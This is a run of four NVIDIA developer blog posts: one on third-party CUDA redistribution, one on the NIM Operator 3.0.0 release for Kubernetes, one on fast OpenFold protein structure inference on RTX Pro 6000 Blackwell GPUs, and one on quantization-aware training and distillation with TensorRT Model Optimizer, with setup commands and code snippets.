Developers Can Now Get CUDA Directly from Their Favorite Third-Party Platforms

Building and deploying applications can be challenging for developers, requiring them to navigate complex relationships between hardware and software capabilities and compatibility. Ensuring that each underlying software component is not only installed correctly but also matches the required version to avoid conflicts can be a time-consuming task, often leading to deployment delays and operational inefficiencies in application workflows.

That's why NVIDIA is making it easier for developers to use the CUDA software stack across operating systems (OSes) and package managers.

The company is working with an ecosystem of distribution platforms to enable CUDA redistribution. OS providers Canonical, CIQ, and SUSE, and the developer environment manager Flox, which enables the Nix package manager, will redistribute CUDA software directly. They can now embed CUDA into their package feeds, simplifying installation and dependency resolution. This is especially useful for adding GPU support to complex applications such as PyTorch and libraries such as OpenCV.

This effort expands CUDA access and ease of use for all developers. It adds to the ways they already have access by letting them get all the software they need in one place. Additional distributors are coming soon.

Each distribution platform that redistributes CUDA will provide several essentials to help developers and companies stay aligned with the CUDA software NVIDIA distributes.

  • Consistent CUDA Toolkit naming: Third-party packages will match NVIDIA's naming conventions to avoid confusion in documentation and tutorials.
  • Timely CUDA updates: Third-party packages will be updated promptly after official NVIDIA releases to ensure compatibility and reduce QA overhead.
  • Continued free access: CUDA itself will remain freely available, even when packaged inside paid software. Distributors may charge for access to their packages or software but will not monetize CUDA specifically.
  • Comprehensive support options: You can access support through the distributors, and you can still find help through the NVIDIA forums or the NVIDIA developer site, as usual.

Getting CUDA software from NVIDIA has always been free, and all current ways of getting CUDA remain available (these include downloading the CUDA Toolkit, pulling CUDA containers, and installing through Python using pip or Conda).

But the ability for distribution platforms to package CUDA inside larger enterprise deployments and software applications lets us keep your experience as a developer simple. You download and install your application, and under the hood, the correct version of CUDA is installed as well.

Working with the ecosystem in this way marks an important milestone in NVIDIA's mission to reduce friction in GPU software deployment. By collaborating with key players across the OS and package management landscape, NVIDIA is ensuring that CUDA remains accessible, consistent, and easy to use, no matter where or how developers choose to build.

Stay tuned for further updates as additional third-party platforms are announced and the CUDA ecosystem continues to grow.

Deploying Scalable AI Inference with NVIDIA NIM Operator 3.0.0

AI models, inference engine backends, and distributed inference frameworks continue to grow in architecture, complexity, and scale. With this rapid pace of change, efficiently deploying and managing the AI inference pipelines that support these advanced capabilities becomes a critical challenge.

NVIDIA NIM Operator is designed to help you scale intelligently. It enables Kubernetes cluster administrators to operate the software components and services needed to run NVIDIA NIM microservices for the latest LLMs and multimodal AI models, including reasoning, retrieval, vision, speech, biology, and more.

The latest NIM Operator 3.0.0 release introduces expanded capabilities that simplify and optimize the deployment of NVIDIA NIM microservices and NVIDIA NeMo microservices across Kubernetes environments. NIM Operator 3.0.0 supports efficient resource utilization and integrates seamlessly with existing Kubernetes infrastructure, including KServe deployments.

NVIDIA customers and partners have been using NIM Operator to efficiently manage inference pipelines for a variety of AI applications and agents, including chatbots, RAG agents, and virtual drug discovery.

NVIDIA recently collaborated with Red Hat to enable NIM deployment on KServe with NIM Operator. “Red Hat contributed to the open source NIM Operator GitHub repo to enable deployment of NIM microservices on KServe,” said Babak Mozaffari, engineering director at Red Hat. This feature lets NIM Operator deploy NIM microservices that benefit from KServe lifecycle management, and it simplifies scalable NIM deployments through the NIM service. Native KServe support in NIM Operator also lets users benefit from NIM Cache and take advantage of microservices such as NeMo.

This post describes the new capabilities in the NIM Operator 3.0.0 release, including:

  • Flexible NIM deployments: multi-LLM compatible and multi-node
  • Efficient GPU utilization with dynamic resource allocation (DRA)
  • Seamless deployment on KServe

Graphic showing the NIM Operator architecture as horizontal layers (top to bottom): NVIDIA generative AI examples; NeMo microservices and NIM microservices; NIM Operator; infrastructure services; Kubernetes; Linux distribution.
Figure 1. NIM Operator architecture

Flexible NIM deployments: multi-LLM compatible and multi-node

NIM Operator 3.0.0 adds support for easy and fast NIM deployments. You can use it with domain-specific NIM microservices, such as those for biology, speech, or retrieval, or with a range of NIM deployment options, including multi-LLM compatible and multi-node deployments.

  • Multi-LLM compatible NIM deployments: Deploy a variety of models with custom weights from sources such as NVIDIA NGC, Hugging Face, or local storage. Use the NIMCache custom resource definition (CRD) to download weights to a PVC and the NIMService CRD to manage deployment, scaling, and ingress (a minimal Python sketch follows below).
  • Multi-node NIM deployments: Address the challenge of deploying large LLMs that cannot fit on a single GPU or that need to run across multiple GPUs, and potentially multiple nodes. NIM Operator supports caching for multi-node NIM deployments using the NIMCache CRD and deploys them using the NIMService CRD on Kubernetes with LeaderWorkerSets (LWS).

Note that multi-node NIM deployments without GPUDirect RDMA can result in frequent restarts of the LWS leader and worker pods because of model shard loading times. Fast network connectivity such as IPoIB or RoCE is strongly recommended and can easily be configured through the NVIDIA Network Operator.
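
To make the multi-LLM flow concrete, the sketch below creates a NIMService custom resource with the Kubernetes Python client. It is a minimal illustration under stated assumptions: the apps.nvidia.com/v1alpha1 API group/version and the spec field names are assumptions drawn from the NIM Operator documentation, so verify them against the CRDs in the NVIDIA/k8s-nim-operator repo before use.

# Minimal sketch: create a NIMService custom resource with the Kubernetes
# Python client. The API group/version and spec fields are assumptions;
# verify against the CRDs shipped with NIM Operator.
from kubernetes import client, config

config.load_kube_config()  # use config.load_incluster_config() inside a pod
api = client.CustomObjectsApi()

nim_service = {
    "apiVersion": "apps.nvidia.com/v1alpha1",  # assumed group/version
    "kind": "NIMService",
    "metadata": {"name": "llama3-8b-instruct", "namespace": "nim-service"},
    "spec": {  # illustrative fields only
        "image": {"repository": "nvcr.io/nim/meta/llama3-8b-instruct", "tag": "latest"},
        "authSecret": "ngc-api-secret",
        "replicas": 1,
        "resources": {"limits": {"nvidia.com/gpu": 1}},
    },
}

api.create_namespaced_custom_object(
    group="apps.nvidia.com",
    version="v1alpha1",
    namespace="nim-service",
    plural="nimservices",
    body=nim_service,
)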

Figure 2 shows the deployment of a large language model (LLM) from the Hugging Face library on Kubernetes using NVIDIA NIM Operator as a multi-LLM NIM deployment. It specifically shows deploying the Llama 3 8B Instruct model, including service and pod status verification, followed by a curl command that sends a request to the service.

Animated GIF of a computer screen showing a multi-LLM deployment of the Llama 3 8B Instruct model using NIM Operator.
Figure 2. Multi-LLM deployment of the Llama 3 8B Instruct model using NIM Operator
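
Once the NIMService is up, the curl request shown in Figure 2 can also be issued from Python. NIM LLM microservices expose an OpenAI-compatible API; the service URL and model name below are placeholders for whatever your deployment exposes.

# Send a chat completion request to a deployed LLM NIM through its
# OpenAI-compatible endpoint. URL and model name are placeholders.
import requests

url = "http://llama3-8b-instruct.nim-service.svc.cluster.local:8000/v1/chat/completions"
payload = {
    "model": "meta/llama3-8b-instruct",
    "messages": [{"role": "user", "content": "Summarize what NIM Operator does."}],
    "max_tokens": 128,
}
resp = requests.post(url, json=payload, timeout=120)
resp.raise_for_status()
print(resp.json()["choices"][0]["message"]["content"])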

Efficient GPU utilization with DRA

Dynamic resource allocation (DRA) is a built-in Kubernetes feature that simplifies GPU management by replacing traditional device plugins with a more flexible and extensible approach. DRA lets users define GPU device classes, request GPUs based on those classes, and filter them according to workload and business needs.

NIM Operator 3.0.0 supports DRA as a technology preview by configuring ResourceClaim and ResourceClaimTemplate objects in NIM pods through the NIMService CRD and NIMPipeline CRD. You can create and attach your own claims or let NIM Operator create and manage them automatically (a minimal sketch of a claim template appears below).

NIM Operator DRA support includes:

  • Full GPU and MIG usage
  • GPU sharing through time-slicing, by assigning the same claim to multiple NIM services

Note: This feature is currently available as a technology preview, with full support coming soon.
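
For reference, the sketch below shows what a minimal DRA claim template requesting one GPU might look like, expressed as a Python dict that could be passed to the Kubernetes client. The resource.k8s.io/v1beta1 API version, the nested field layout, and the gpu.nvidia.com device class follow recent upstream DRA releases and the NVIDIA DRA driver, and should be treated as assumptions to verify against your cluster and the NIM Operator documentation.

# Minimal sketch of a DRA ResourceClaimTemplate requesting one GPU from the
# gpu.nvidia.com device class. API version and field layout are assumptions
# based on recent upstream DRA releases; verify against your cluster.
claim_template = {
    "apiVersion": "resource.k8s.io/v1beta1",
    "kind": "ResourceClaimTemplate",
    "metadata": {"name": "single-gpu", "namespace": "nim-service"},
    "spec": {
        "spec": {
            "devices": {
                "requests": [
                    {"name": "gpu", "deviceClassName": "gpu.nvidia.com"}
                ]
            }
        }
    },
}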

Figure 3 shows the deployment of a Llama 3 8B Instruct NIM using Kubernetes DRA with NIM Operator. Users can define resource claims in the NIM service to request specific hardware attributes such as GPU architecture and memory, and interact with the deployed LLM using curl.

Animated GIF of a computer screen showing the deployment of a Llama 3 8B Instruct NIM using Kubernetes DRA with NIM Operator.
Figure 3. Deployment of a Llama 3 8B Instruct NIM using Kubernetes DRA with NIM Operator

Seamless deployment on KServe

KServe is a widely adopted open source inference serving platform used by many partners and customers. NIM Operator 3.0.0 supports both raw and serverless deployments on KServe by configuring the InferenceService custom resource to manage NIM deployment, upgrades, and autoscaling. NIM Operator simplifies the deployment process by automatically configuring all the required environment variables and resources in the KServe InferenceService CRD.

This integration provides two additional benefits:

  • Smart caching with NIM Cache to reduce initial inference time and autoscaling latency, resulting in faster, more responsive deployments.
  • NeMo microservices support for evaluation, guardrails, and customization to improve AI systems for latency, accuracy, cost, and compliance.

Figure 4 shows the deployment of a Llama 3.2 1B Instruct NIM on KServe using NIM Operator. Two different deployment methodologies are shown: RawDeployment and Serverless. The serverless deployment incorporates autoscaling functionality through Kubernetes annotations. Both strategies use a curl command to test the NIM response.

Animated GIF of a computer screen showing the deployment of a Llama 3.2 1B Instruct NIM on KServe using NIM Operator.
Figure 4. Deployment of a Llama 3.2 1B Instruct NIM on KServe using NIM Operator with the RawDeployment and Serverless methodologies

Start scaling AI inference with NIM Operator 3.0.0

NVIDIA NIM Operator 3.0.0 makes deploying scalable AI inference easier than ever. Whether you are working with multi-LLM compatible or multi-node NIM deployments, optimizing GPU usage with DRA, or deploying on KServe, this release lets you build high-performance, flexible, and scalable AI applications.

By automating deployment, scaling, and lifecycle management of both NVIDIA NIM and NVIDIA NeMo microservices, NIM Operator makes it easy for enterprise teams to adopt AI workflows. This effort aligns with making AI workflows easy to use through NVIDIA AI Blueprints, enabling a fast path to production. NIM Operator is part of NVIDIA AI Enterprise, providing enterprise support, API stability, and proactive security patching.

Get started through NGC or from the NVIDIA/k8s-nim-operator open source GitHub repo. For technical questions about installation, usage, or issues, file an issue on the NVIDIA/k8s-nim-operator GitHub repo.

Accelerate Protein Structure Inference by More Than 100x with NVIDIA RTX Pro 6000 Blackwell Server Edition

The race to understand protein structures has never been more critical. From accelerating drug discovery to preparing for future pandemics, the ability to predict how proteins fold determines our capacity to solve humanity's most pressing biological challenges. Since the release of AlphaFold2, AI inference for determining protein structures has skyrocketed. Tools that are not optimized for protein structure inference can cost millions in lost research time and prolonged compute utilization.

The new NVIDIA RTX Pro 6000 Blackwell Server Edition GPU fundamentally changes this. Despite the AlphaFold2 breakthrough, CPU-bound multiple sequence alignment (MSA) generation and inefficient GPU inference have remained the rate-limiting steps. Building on previous collaborative efforts, new accelerations developed by the NVIDIA Digital Biology Research Lab enable faster protein structure inference than ever before using OpenFold, with no accuracy cost compared to AlphaFold2.

In this post, we show how to run large-scale protein analysis using the RTX Pro 6000 Blackwell Server Edition GPU, delivering unprecedented protein structure inference performance for software platforms, cloud providers, and research institutions.

Video 1. The NVIDIA RTX Pro 6000 Blackwell Server Edition GPU sets a new benchmark for protein structure inference

Why do speed and scale matter in protein structure prediction?

Protein folding sits at the intersection of the most computationally demanding workloads in computational biology. Modern drug discovery pipelines require analyzing thousands of protein structures. At the same time, enzyme engineering projects demand rapid iteration cycles to optimize biological function, and agricultural biotech applications require screening large protein libraries to develop climate-resistant crops.

The computational challenge can be enormous: a single protein structure prediction can involve metagenomic-scale MSAs, iterative refinement steps, and ensemble calculations that typically require substantial compute time. When scaled across proteomes or drug target libraries, these workloads become prohibitively time-consuming on CPU-based infrastructure.

For example, in a direct comparison of multiple sequence alignment tools, MMseqs2-GPU completed alignments 177x faster on a single NVIDIA L40S than CPU-based JackHMMER on a 128-core CPU, and up to 720x faster when distributed across eight NVIDIA L40S GPUs. These speedups highlight how GPU acceleration dramatically reduces computational bottlenecks in protein bioinformatics.

How does NVIDIA enable the fastest protein structure AI available?

Building on recent releases such as cuEquivariance and the Boltz-2 NIM microservice, the NVIDIA Digital Biology Research Lab validated breakthrough performance improvements for OpenFold using the RTX Pro 6000 Blackwell Server Edition and NVIDIA TensorRT across industry-standard benchmarks (Figure 1).

Graphic illustrating the process of passing an amino acid sequence to MMseqs2-GPU to generate a multiple sequence alignment, which is then passed to the OpenFold2 AI model to predict the protein structure.
Figure 1. Protein structure prediction with MMseqs2-GPU and OpenFold2

Leveraging new instructions and TensorRT, MMseqs2-GPU and OpenFold on the RTX Pro 6000 Blackwell deliver transformational performance for protein structure prediction, executing folds more than 138x faster than AlphaFold2 and about 2.8x faster than ColabFold, while maintaining identical TM-scores.

First, faster inference is enabled by MMseqs2-GPU on the RTX Pro 6000 Blackwell, which runs approximately 190x faster than JackHMMER and HHblits on dual-socket AMD 7742 CPUs. In addition, bespoke TensorRT optimizations targeting OpenFold improve inference speed by 2.3x compared to the initial OpenFold. Validated on 20 CASP14 protein targets, these benchmarks establish the RTX Pro 6000 Blackwell as a breakthrough solution for end-to-end protein structure prediction.

Eliminating memory bottlenecks

In addition, 96 GB of high-bandwidth memory (1.6 TB/s) allows the RTX Pro 6000 Blackwell to fold entire protein ensembles and large MSAs, enabling full workflows to remain GPU-resident. Multi-Instance GPU (MIG) functionality lets a single RTX Pro 6000 Blackwell act like four GPUs, each powerful enough to outperform an NVIDIA L4 Tensor Core GPU. This lets multiple users or workflows share a server without sacrificing speed or accuracy.

Here is a complete example showing how to leverage the performance of the RTX Pro 6000 for fast protein structure prediction. The first step is to deploy the OpenFold2 NIM on your local machine.

# See https://build.nvidia.com/openfold/openfold2/deploy for
# instructions to configure your docker login, NGC API Key, and
# environment for running the OpenFold NIM on your local system.

# Run this in a shell, providing the username below and your NGC API Key
$ docker login nvcr.io
Username: $oauthtoken
Password: <PASTE_API_KEY_HERE>

export NGC_API_KEY=<your personal NGC key>

# Configure local NIM cache directory so the NIM model download can be reused
export LOCAL_NIM_CACHE=~/.cache/nim
mkdir -p "$LOCAL_NIM_CACHE"
sudo chmod 0777 -R "$LOCAL_NIM_CACHE"

# Then launch the NIM container, in this case using GPU device ID 0.
docker run -it \
    --runtime=nvidia \
    --gpus='"device=0"' \
    -p 8000:8000 \
    -e NGC_API_KEY \
    -v "$LOCAL_NIM_CACHE":/opt/nim/.cache \
    nvcr.io/nim/openfold/openfold2:latest

# It can take some time to download all model assets on the initial run.
# You can check the status using the built-in health check.  This will
# return {"status": "ready"} when the NIM endpoint is ready for inference.
curl http://localhost:8000/v1/health/ready

Once the NIM is deployed locally, you can build an inference request and use the local endpoint to generate protein structure predictions.

#!/usr/bin/env python3

import requests
import os
import json
from pathlib import Path

# ----------------------------
# parameters
# ----------------------------
output_file = Path("output1.json")
selected_models = [1, 2]

# SARS-CoV-2 proteome example
# Spike protein (1273 residues) — critical for vaccine development
sequence = (
"MFVFLVLLPLVSSQCVNLTTRTQLPPAYTNSFTRGVYYPDKVFRSSVLHSTQDLFLPFFSNVTWFHAIHVSGTNGTKRFDNPVLPFNDGVYFAST
EKSNIIRGWIFGTTLDSKTQSLLIVNNATNVVIKVCEFQFCNDPFLGVYYHKNNKSWMESEFRVYSSANNCTFEYVSQPFLMDLEGKQGNFKNL
REFVFKNIDGYFKIYSKHTPINLVRDLPQGFSALEPLVDLPIGINITRFQTLLALHRSYLTPGDSSSGWTAGAAAYYVGYLQPRTFLLKYNENGTITDAVD
CALDPLSETKCTLKSFTVEKGIYQTSNFRVQPTESIVRFPNITNLCPFGEVFNATRFASVYAWNRKRISNCVADYSVLYNSASFSTFKCYGVSPTKLNDLC
FTNVYADSFVIRGDEVRQIAPGQTGKIADYNYKLPDDFTGCVIAWNSNNLDSKVGGNYNYLYRLFRKSNLKPFERDISTEIYQAGSTPCNGVEGFNCY
FPLQSYGFQPTNGVGYQPYRVVVLSFELLHAPATVCGPKKSTNLVKNKCVNFNFNGLTGTGVLTESNKKFLPFQQFGRDIADTTDAVRDPQTLEILDITP
CSFGGVSVITPGTNTSNQVAVLYQDVNCTEVPVAIHADQLTPTWRVYSTGSNVFQTRAGCLIGAEHVNNSYECDIPIGAGICASYQTQTNSPRRARS
VASQSIIAYTMSLGAENSVAYSNNSIAIPTNFTISVTTEILPVSMTKTSVDCTMYICGDSTECSNLLLQYGSFCTQLNRALTGIAVEQDKNTQEVFAQV
KQIYKTPPIKDFGGFNFSQILPDPSKPSKRSFIEDLLFNKVTLADAGFIKQYGDCLGDIAARDLICAQKFNGLTVLPPLLTDEMIAQYTSALLAGTITSGWT
FGAGAALQIPFAMQMAYRFNGIGVTQNVLYENQKLIANQFNSAIGKIQDSLSSTASALGKLQDVVNQNAQALNTLVKQLSSNFGAISSVLNDILSRLD
KVEAEVQIDRLITGRLQSLQTYVTQQLIRAAEIRASANLAATKMSECVLGQSKRVDFCGKGYHLMSFPQSAPHGVVFLHVTYVPAQEKNFTTAPAICHD
GKAHFPREGVFVSNGTHWFVTQRNFYEPQIITTDNTFVSGNCDVVIGIVNNTVYDPLQPELDSFKEELDKYFKNHTSPDVDLGDISGINASVVNIQK
EIDRLNEVAKNLNESLIDLQELGKYEQYIKWPWYIWLGFIAGLIAIVMVTIMLCCMTSCCSCLKGCCSCGSCCKFDEDDSEPVLKGVKLHYT"
)

data = {
    "sequence": sequence,
    "selected_models": [1, 2],
    "relax_prediction": False,
}
print(data)

# ---------------------------------------------------------
# Submit
# ---------------------------------------------------------
url = "http://localhost:8000/biology/openfold/openfold2/predict-structure-from-msa-and-template"
print("Making request...")
response = requests.post(url=url, json=data)

# ---------------------------------------------------------
# View response
# ---------------------------------------------------------
if response.status_code == 200:
    output_file.write_text(response.text)
    print(f"Response output to file: {output_file}")

else:
    print(f"Unexpected HTTP status: {response.status_code}")
    print(f"Response: {response.text}")

Get started accelerating protein AI workflows

Whereas AlphaFold2 once required heterogeneous high-performance compute nodes, NVIDIA's accelerations for protein structure prediction, including modular components in cuEquivariance, TensorRT, and MMseqs2-GPU on the RTX Pro 6000 Blackwell, enable folding on a single server. This makes proteome-scale folding accessible to any lab or software platform, with the fastest time-to-prediction to date.

Whether you are developing a software platform for drug discovery, building agricultural biotech solutions, or conducting pandemic preparedness research, the unprecedented performance of the RTX Pro 6000 Blackwell will transform your computational biology workflows. The RTX Pro 6000 Blackwell Server Edition is available today in NVIDIA RTX Pro servers from global system makers, as well as in cloud instances from leading cloud service providers.

Ready to get started? Find a partner for the NVIDIA RTX Pro 6000 Blackwell Server Edition and experience protein folding at unprecedented speed and scale.

Acknowledgments

We'd like to thank the researchers from NVIDIA, University of Oxford, and Seoul National University who contributed to this research, including Christian Dallago, Alejandro Chacon, Kieran Didi, Prashant Sohani, Fabian Berressem, Alexander Nesterovskiy, Robert Ohannessian, Mohamed Elbalkini, Jonathan Cogan, Ania Kukushkina, Anthony Costa, Arash Vahdat, Bertil Schmidt, Milot Mirdita, dan Martin Steinegger.

How Quantization Aware Training Enables Low-Precision Accuracy Recovery

After training AI models, a variety of compression techniques can be used to optimize them for deployment. The most common is post-training quantization (PTQ), which applies numerical scaling techniques to approximate model weights in lower-precision data types. But two other strategies—quantization aware training (QAT) and quantization aware distillation (QAD)—can succeed where PTQ falls short by actively preparing the model for life in lower precision (See Figure 1 below).

QAT and QAD aim to simulate the impact of quantization during post-training, allowing higher-precision model weights and activations to adapt to the new format’s representable range. This adaptation provides a smoother transition from higher to lower precisions, often yielding greater accuracy recovery.

Flowchart showing the decision process for model quantization and deployment. It begins with a higher precision checkpoint. The model first undergoes Post-Training Quantization (PTQ). If accuracy criteria are met, the model is deployed. If not, Quantization Aware Training (QAT) or Quantization Aware Distillation (QAD) is applied. From there the model is either deployed if accuracy criteria are met, or iteratively refined.
Figure 1. Decision pipeline for PTQ, QAT, and QAD showing how models progress toward deployment based on accuracy criteria.

In this blog, we explore QAT and QAD, and demonstrate how to apply them with the TensorRT Model Optimizer. Model Optimizer provides APIs that are natively compatible with Hugging Face and PyTorch, enabling developers to seamlessly prepare models for QAT/QAD while leveraging familiar training workflows. Once the final model is trained using these techniques, we demonstrate how to efficiently export and deploy them with TensorRT-LLM.

What is Quantization Aware Training? 

QAT is a technique in which the model learns to handle low-precision arithmetic during an additional training phase after pre-training. Unlike PTQ, which quantizes a model after full-precision training using a calibration dataset, QAT trains the model with quantized values in the forward path. The QAT workflow is nearly identical to the PTQ workflow; the key difference is that a training phase is injected after the quantization recipe has been applied to the original model (Figure 2 below).

Flowchart illustrating the Quantization Aware Training (QAT) workflow. On the left, an original precision model is combined with calibration data and a Model Optimizer quantization recipe to form a QAT-ready model. This model, along with a subset of original training data, enters the QAT training loop. Inside the loop, high-precision weights are updated and then used as “fake quantization” weights during the forward pass. Training loss is calculated, and the backward pass uses a straight-through estimator (STE) to propagate gradients. The loop repeats until training converges.
Figure 2. Workflow of Quantization Aware Training (QAT), showing how a model is prepared, quantized, and iteratively trained with simulated low-precision weights.

The goal of QAT is to produce a quantized model with high accuracy for inference performance. This makes QAT different from quantized training, which targets improvements in training efficiency. QAT may therefore use methods that are not optimal for training throughput but result in a more accurate model for inference.

QAT is typically performed with “fake quantized” weights and activations in the forward pass. In this approach, lower precision is represented within a higher data type through a quantize/dequantize operator (See Figure 3 below). As a result, QAT does not require native hardware support. QAT for NVFP4, for instance, can be carried out on Hopper GPUs using simulated quantization. It integrates naturally into existing higher precision pipelines, with backward gradients computed in higher precision and quantization modeled as a pass-through operation (straight-through estimation, STE). Additional steps, such as zeroing outlier gradients, may also be applied, adding overhead beyond BF16 or FP16.

By exposing the loss function to rounding and clipping errors during training, QAT enables the model to adapt and recover from them. In practice, QAT may not maximize training performance, but it provides a stable and practical training process that yields a high accuracy quantized inference model.

Infographic showing the quantize/dequantize (Q/DQ) workflow across two adjacent neural network layers: Layer N’s 16-bit weights are quantized to the target precision, immediately dequantized back to 16-bit values, and those dequantized weights feed the layer’s ops; Layer N’s output activations then flow to Layer N+1, which likewise consumes dequantized weights. Quantization error is introduced at the quantize step, dequantization restores the datatype for compatibility, and tensor shapes are unchanged.
Figure 3. This figure illustrates “fake quantization” across adjacent layers during QAT/PTQ. Layer N’s weights are quantized to a target precision, immediately dequantized back to BF16/FP16, and then used by the layer’s ops—so computation runs on approximate (dequantized) values. The resulting Layer N output activations then feed Layer N+1, which likewise uses dequantized weights, showing that the next layer’s inputs are dequantized activations while precision errors originate at quantization and persist downstream.
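
As a minimal illustration of the fake-quantization idea (not Model Optimizer's internal implementation), the PyTorch sketch below rounds a tensor onto a small symmetric integer grid in the forward pass and applies a straight-through estimator so the backward pass sees identity gradients, exactly the behavior described above.

# Minimal fake-quantization sketch with a straight-through estimator (STE).
# Illustrative only; not Model Optimizer's internal implementation.
import torch

def fake_quantize(x: torch.Tensor, num_bits: int = 4) -> torch.Tensor:
    qmax = 2 ** (num_bits - 1) - 1                 # symmetric integer grid
    scale = x.abs().amax().clamp(min=1e-8) / qmax  # per-tensor scale factor
    q = torch.clamp(torch.round(x / scale), -qmax, qmax) * scale
    # STE: forward uses the quantized value, backward passes gradients through.
    return x + (q - x).detach()

w = torch.randn(8, 8, requires_grad=True)
fake_quantize(w).sum().backward()
print(w.grad.unique())  # all ones: rounding and clipping are invisible to the gradient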

Some implementations of QAT/QAD do not require fake quantization, but those methods are out of scope of this blog. In the current Model Optimizer implementation, the output of QAT is a new model in the original precision with updated weights along with critical metadata for converting to the target format such as: 

  • Scaling factors (dynamic ranges) for each layer activation
  • Quantization parameters such as bits
  • Block size

How to apply QAT with Model Optimizer

Applying QAT with Model Optimizer is fairly straightforward. QAT supports the same quantization formats as the PTQ workflow, including key formats such as FP8, NVFP4, MXFP4, INT8, and INT4. For the code snippet below, we selected NVFP4 weight and activation quantization. 

import modelopt.torch.quantization as mtq

config = mtq.NVFP4_MLP_ONLY_CFG

# Define forward loop for calibration
def forward_loop(model):
    for data in calib_set:
        model(data)

# quantize the model and prepare for QAT
model = mtq.quantize(model, config, forward_loop) 

Up to this point, the code is identical to PTQ. To apply QAT, we need to perform a training loop. This loop includes standard tunable parameters such as the choice of optimizer, scheduler, learning rate, and so on.

# QAT with a regular finetuning pipeline
# Adjust learning rate and training epochs
train(model, train_loader, optimizer, scheduler, ...)

For optimal results, we suggest running QAT for a duration equivalent to about 10% of the initial training epochs. In the context of LLMs, we’ve observed that QAT fine-tuning for even less than 1% of the original pre-training time is often sufficient to restore the model’s quality. To dive deeper into QAT, we recommend exploring the complete Jupyter notebook walkthrough.
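
Once QAT converges, the updated checkpoint can be exported for deployment. The short sketch below assumes the Hugging Face checkpoint export API available in recent Model Optimizer releases (verify the function name and arguments against the Model Optimizer documentation); the exported directory can then be served with TensorRT-LLM.

# Export the QAT model for deployment. export_hf_checkpoint is assumed to be
# available in recent Model Optimizer releases; verify against the docs.
from modelopt.torch.export import export_hf_checkpoint

export_hf_checkpoint(model, export_dir="qat-nvfp4-checkpoint")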

What is Quantization Aware Distillation?

Similar to QAT, QAD aims to recover accuracy after post-training quantization, but it simultaneously performs knowledge distillation. Unlike standard knowledge distillation, where a larger “teacher” model guides a smaller “student” model, the student in QAD is the same model, simply running with fake quantization during the forward pass. The teacher model is the original higher precision model that has already been trained on the same data. The distillation process aligns the quantized student’s outputs with the full-precision teacher’s outputs, using a distillation loss to measure how far the quantized predictions deviate (Figure 4 below).

Flowchart of Quantization Aware Distillation (QAD). On the left, an original precision model is combined with calibration data and a quantization recipe to create a QAD-ready student model. This student model is paired with a higher precision teacher model and a subset of the original training data. In the QAD training loop, the student uses “fake quantization” weights in its forward pass, while the teacher performs a standard forward pass. Outputs are compared to calculate QAD loss, which combines distillation loss with standard training loss. Gradients flow back through the student model using a straight-through estimator (STE), and the student’s high-precision weights are updated to adapt to quantization conditions.
Figure 4. QAD trains a low-precision student model under teacher guidance, combining distillation loss with standard QAT updates.

The student’s computations are fake quantized during the distillation process while the teacher remains at full precision. Any mismatch introduced by quantization is directly exposed to the distillation loss, allowing the low-precision weights and activations to adjust toward the teacher’s behavior (Figure 5 below). After QAD, the resulting model runs with the same inference performance as PTQ and QAT (since precision and the architecture are unchanged), but the accuracy recovery can be higher, thanks to the additional learning provided by the distillation loss. 

Diagram of the gradient and loss flow in Quantization Aware Distillation (QAD). On the left, a loss landscape curve illustrates gradient descent, with a note that high precision math is used for gradient computation and weight accumulation. In the center, a neural network represents the student model: original precision weights are updated under quantization conditions. A green arrow labeled “Straight Through Estimator” carries gradients backward. On the right, the student’s outputs are compared to the teacher’s outputs to calculate distillation loss, which is combined with standard QAT loss to form the overall QAD loss.
Figure 5. QAD loss combines distillation loss from the teacher with QAT loss, updating student weights through STE under quantization conditions.

In practice, this approach is more effective than distilling a FP32 model and then quantizing it, since the QAD process is better able to take into account the quantization error and adjust the model directly to account for it.
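
The PyTorch sketch below shows the general shape of a QAD-style objective under these assumptions: the student runs with fake-quantized weights, the frozen teacher runs at full precision, and the loss blends a temperature-scaled KL distillation term with the ordinary task loss. It is a schematic of the idea, not Model Optimizer's QAD implementation.

# Schematic QAD objective: task loss plus temperature-scaled KL distillation
# between the fake-quantized student and the full-precision teacher.
# Illustrative only; not Model Optimizer's QAD implementation.
import torch
import torch.nn.functional as F

def qad_loss(student_logits, teacher_logits, labels, alpha=0.5, temperature=2.0):
    task_loss = F.cross_entropy(student_logits, labels)
    distill_loss = F.kl_div(
        F.log_softmax(student_logits / temperature, dim=-1),
        F.softmax(teacher_logits / temperature, dim=-1),
        reduction="batchmean",
    ) * (temperature ** 2)
    return alpha * distill_loss + (1 - alpha) * task_loss

# Inside the training loop (teacher frozen, student fake-quantized):
#   with torch.no_grad():
#       teacher_logits = teacher(batch)
#   student_logits = student(batch)
#   loss = qad_loss(student_logits, teacher_logits, labels)
#   loss.backward()  # gradients reach the high-precision weights via STE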

How to apply QAD with Model Optimizer

TensorRT Model Optimizer currently provides experimental APIs for applying this technique. Starting with a process similar to QAT and PTQ, the quantization recipe must first be applied to the student model. After that, the distillation configuration can be defined, specifying elements such as the teacher model, training arguments, and the distillation loss function. The QAD APIs will undergo improvements to simplify the application of this technique. To track the latest code examples and documentation, explore the QAD section of the Model Optimizer repository. 

Evaluating the Impact of QAT and QAD

Not all models require QAT or QAD—many retain over 99.5% of their original accuracy across key benchmarks with just PTQ. 

In some cases, like that of Llama Nemotron Super, we observe significant benefits from QAD. Figure 6 below compares this model’s baseline BF16 scores across benchmarks such as GPQA Diamond, LIVECODEBENCH, Math-500, and AIME 2024 to the checkpoints after PTQ and QAD. With the exception of LIVECODEBENCH, the benchmarks recover 4-22 percentage points of accuracy when leveraging QAD.

Bar chart comparing model evaluation accuracy across quantization techniques for the “Super Llama Nemotron Reasoning” model. The chart measures accuracy for four benchmarks: GPQA Diamond, LIVECODEBENCH, Math-500, and AIME 2024. For GPQA Diamond, BF16 baseline scores 0.64, PTQ 0.60, and QAD 0.64. LIVECODEBENCH shows equal accuracy of 0.28 for BF16, PTQ, QAT, and QAD. On Math-500, BF16 baseline achieves 0.96, PTQ 0.90, QAT 0.96, and QAD 0.96. For AIME 2024, BF16 baseline scores 0.58, PTQ 0.36, QAT 0.58, and QAD 0.58. Overall, QAD consistently matches BF16 accuracy while PTQ lags behind in some benchmarks.
Figure 6. QAD preserves baseline accuracy across benchmarks, using Super Llama Nemotron Reasoning, outperforming PTQ in tasks like Math-500 and AIME 2024. QAT accuracy was not measured for this model, but can be expected to score between PTQ and QAD.

In practice, the success of QAT and QAD depends heavily on the quality of the training data, the chosen hyperparameters, and the model architecture. When quantizing down to 4-bit data types, formats like NVFP4 benefit from more granular and higher-precision scaling factors. 

